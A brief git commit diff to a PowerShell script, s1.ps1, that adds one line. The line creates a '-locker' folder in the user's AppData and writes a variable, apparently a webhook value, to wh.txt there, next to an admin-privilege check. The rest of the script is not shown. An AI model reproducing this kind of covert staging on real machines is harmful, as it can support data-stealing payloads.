Update s1.ps1
This commit is contained in:
parent
0739f8f154
commit
769672b74a
1 changed files with 2 additions and 0 deletions
|
@ -11,4 +11,6 @@ if($isAdmin){
|
|||
}
|
||||
}
|
||||
|
||||
if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};echo $dc > "$env:appdata\-locker\wh.txt";
|
||||
|
||||
s1
|
||||
|
|
Loading…
Reference in a new issue